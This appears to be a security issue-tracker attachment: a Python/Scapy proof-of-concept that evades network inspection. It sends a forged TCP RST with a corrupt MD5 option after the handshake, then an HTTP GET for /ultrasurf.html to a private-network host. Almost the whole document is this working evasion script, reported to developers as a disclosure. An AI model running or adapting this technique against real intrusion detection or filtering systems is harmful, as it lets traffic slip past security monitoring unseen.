Project

General

Profile

Download (1.65 KB)

Security #4710 » poc.py

A python script to play the evasion technique - Chang Zedd, 09/26/2021 02:56 AM

 
from scapy.all import *

dst = "192.168.112.136"
dport = 80
sport = random.randint(1024,65535)
seq = random.randint(1,50000)

pkt = IP(dst = dst)

"""
Note: Linux might send an RST for forged SYN packets. Disable it by executing:
> iptables -A INPUT -j NFQUEUE --queue-num 0
"""

# 3whs start
# SYN
pkt_syn = pkt/TCP(sport=sport,dport=dport,seq=seq, flags = 'S')

# SYN/ACK

pkt_syn_ack = sr1(pkt_syn, verbose = 0)

# ACK
seq +=1
ack = pkt_syn_ack.seq+1
pkt_ack = pkt/TCP(sport=sport,dport=dport,seq=seq,ack=ack,flags='A')
send(pkt_ack)


# RST with corrupt MD5 TCP option
md5header_option_num = 19
md5header_option_length = 16
md5header_data =b''
md5header_data =os.urandom(md5header_option_length)

pkt_rst = pkt/ TCP(sport=sport, dport=dport, seq=seq , ack=ack , flags = 'RA',options=[(md5header_option_num,md5header_data)])
send(pkt_rst)

# send http request

http_req = '\r\n'.join(['GET /ultrasurf.html HTTP/1.1'
,'Accept-Encoding: identity'
,'Host: {}'.format(dst)
,'User-Agent: Python-urllib/3.6'
,'Connection: close'
,'\r\n'])

pkt_http_req = pkt/TCP(sport = sport, dport=dport ,seq=seq ,ack=ack,flags='AP')/http_req
pkt_fin_ack = pkt/TCP(sport = sport, dport = dport, seq = seq + len(http_req), ack = ack, flags = 'AF')

# Send GET request
send(pkt_http_req)
# Send FIN/ACK just after GET request
send(pkt_fin_ack)
# Receive GET answer
pkt_http_resp = sniff(filter = 'tcp', count = 1)
print (str(pkt_http_resp[0].payload)[40:])
# Send RST/ACK after response
pkt_rst_ack = pkt/TCP(sport = sport, dport = dport, seq = seq + len(http_req) + 1, ack = ack + len(str(pkt_http_resp[0].payload)[40:]), flags = 'AR')
send(pkt_rst_ack)
(1-1/5)